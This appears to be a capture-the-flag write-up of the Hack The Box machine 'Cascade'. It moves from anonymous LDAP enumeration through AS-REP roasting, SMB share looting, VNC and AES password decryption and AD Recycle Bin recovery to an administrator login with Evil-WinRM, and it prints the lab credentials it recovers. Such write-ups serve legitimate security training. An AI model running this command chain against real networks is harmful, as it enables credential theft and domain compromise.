# Cascade ## Autorecon results **Password:** PentestEverything {% file src="" %} ## Nmap ``` nmap 10.10.10.182 -p- -Pn -sS -sV PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-02 18:33:43Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49170/tcp open msrpc Microsoft Windows RPC Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows ``` {% hint style="info" %} Add "10.10.10.182 cascade.local" to /etc/hosts. {% endhint %} Starting out on this machine we run a simple `nmap` script scan against `LDAP` with null credentials. ```bash nmap -n -sV --script "ldap* and not brute" '10.10.10.182' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dd3da36171168119be31fa936d7347198de86ba6%2Fimage.png?alt=media) Seeing as we are able to pull some information with the above command, we can try `ldapseacher` with `NULL` credentials know that we know the required domain information. ```bash ldapsearch -x -h "10.10.10.182" -D '' -w '' -b "DC=cascade,DC=local" ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b0f9d2cd69bfc127dd83a2a92214c7aac0e4dce6%2Fimage.png?alt=media) We find this spits out a serious amount of information. Ideally, we will run this against and identify some user accounts. ```bash # Search for users, cleanup and output to file ldapsearch -x -h "10.10.10.182" -D '' -w '' -b "DC=cascade,DC=local" | grep "userPrincipalName" | sed 's/userPrincipalName: //' | sort > ADUsers.txt ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b8021668b725067d501fa094eed09ee17610738%2Fimage.png?alt=media) Now, with a list of users we can start trying to find ways into the accounts. First up, checking the target domain for users with 'Do not require Kerberos preauthentication'. ``` python2 /opt/impacket-0.9.19/examples/GetNPUsers.py cascade.local/ -usersfile ADUsers.txt -dc-ip 10.10.10.182 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0ff377a61ff0880a002c02923e62f73c1a8569d7%2Fimage.png?alt=media) Unfortunately we get no results here... I also attempted password spraying the accounts for quite some time. Again, nothing. As `LDAP` has spewed so much data with `NULL` credentials I decided to look again, this time using a graphical explorer. ``` sudo apt install jxplorer ``` Where we can login using the following settings: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8f400cfc90c898e70eabcaea48a4991c493c09b5%2Fimage.png?alt=media) After some time of pouring through the results manually we come across an interesting attribute for the user *r.thompson*. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d676e1d16614ea5d464e5a087a73f70e9b4de6ea%2Fimage.png?alt=media) ``` cascadeLegacyPwd:clk0bjVldmE= ``` Decoding the `Base64` value gives us a valid credential. ``` echo 'clk0bjVldmE=' | base64 -d rY4n5eva ``` We now have the following credentials ``` r.thompson:rY4n5eva ``` We can see from the `LDAP` results above *r.thompson* is not a member of the Remote Management Users group so `WinRM` will not work here. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-197353e398e571e6acf32f30724e9bda684efc8f%2Fimage.png?alt=media) As the credentials are valid we can then try download the contents of selected shares. ```bash smbclient -U 'r.thompson' '\\10.10.10.182\Data\' -c 'prompt OFF;recurse ON; mget *' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bf976b2fe4d59146bee978b6dc2d01ad1ce4527b%2Fimage.png?alt=media) Under `/IT/Temp/s.smith/` we have a file called `"VNC Install.reg"`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e6a4ef804bdf33c0cef05f75595a4d46c350bfaf%2Fimage.png?alt=media) We can see from the above image we have the above HEX value in the password field. ``` 6bcf2a4b6e5aca0f ``` After a little bit of research on Google we find the value can be decrypted using the following command. ```bash echo -n "6bcf2a4b6e5aca0f" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae3753d677030f228cb682c5a24616c9dd442d7e%2Fimage.png?alt=media) For the credentials: ``` s.smith:sT333ve2 ``` We know from enumeration earlier that s.smith is a member of the AD group "Audit Share". ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9snRYwNeCo4hYC2Gx4UR%2Fimage.png?alt=media\&token=2a5f6d55-9a8a-413e-9f5d-9fa334a14919) Knowing this, we can take a guess that they have access to the `AUDIT$` `SMB` share. ```bash smbclient -U 's.smith' '\\10.10.10.182\AUDIT$\' -c 'prompt OFF;recurse ON; mget *' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-843fce222cb3c3a04e3f8ed5cdeac9f3d58bd44d%2Fimage.png?alt=media) Opening the database from `Audit.db` database file from the DB folder shows a `Base64` encoded value for the *ArkSvc* user. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b9096041e4c04fbd4853bdf6251b3350c1ed7884%2Fimage.png?alt=media) ```bash echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d ``` Of which, when, decoded appears to be encrypted. To read the `exe` and `DLL` files included in the `SMB` share we need to jump onto a Windows host and use `dnSpy`. **Github**: Opening both `CaseCrypto.dll` and `CaseAudit.exe` in dnSpy we can obtain valuable information from both files when carefully reading the code. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9037e99075bfbba0221a6b4fc36e91cc487413d2%2FDLL-DNSspy.PNG?alt=media) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-799fe52f4de9b98621a879796b0ee1b1efc3a9be%2Fexe-DNSspy.PNG?alt=media) ``` IV:1tdyjCbY1Ix49842 Key:c4scadek3y654321 Mode:CBC Size:128 ``` This information can be plugged into the following website to reveal the encrypted string. **URL:** ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6e07d0bbebcf1ff4fc1728daabce5452dffc8081%2Fimage.png?alt=media) For the credentials: ``` arksvc:w3lc0meFr31nd ``` Where we can log in over `WinRM` with `Evil-WinRM`. ```bash evil-winrm -u 'arksvc' -p 'w3lc0meFr31nd' -i '10.10.10.182' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-23ce3dc9197f993474c174c1265daf3a65d11c1e%2Fimage.png?alt=media) Looking at our group memberships we see we are a member of the group *"AD Recycle Bin"*. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b79a44d847f01a63e40a120e9a063d854ba10112%2Fimage.png?alt=media) We can use the `PowerShell` AD module to listed deleted users. ```powershell Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties * ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-86b80c5b38ee3a973429a862712c6a3e78c9e68b%2Fimage.png?alt=media) ```bash echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d ``` Credentials: ``` tempadmin:baCT3r1aN00dles ``` From enumerating the `SMB` shares earlier we came across the following file from the Data share: Meeting\_Notes\_June\_2018.html ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ae623d5cc578c243074e0b81f36d460888a57c2a%2Fimage.png?alt=media) With this information we can then log in as the administrator account and grab the root flag. ```bash evil-winrm -u 'administrator' -p 'baCT3r1aN00dles' -i '10.10.10.182' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0f711c88fc29b85949400bb9698c38e1fb5f22d7%2Fimage.png?alt=media)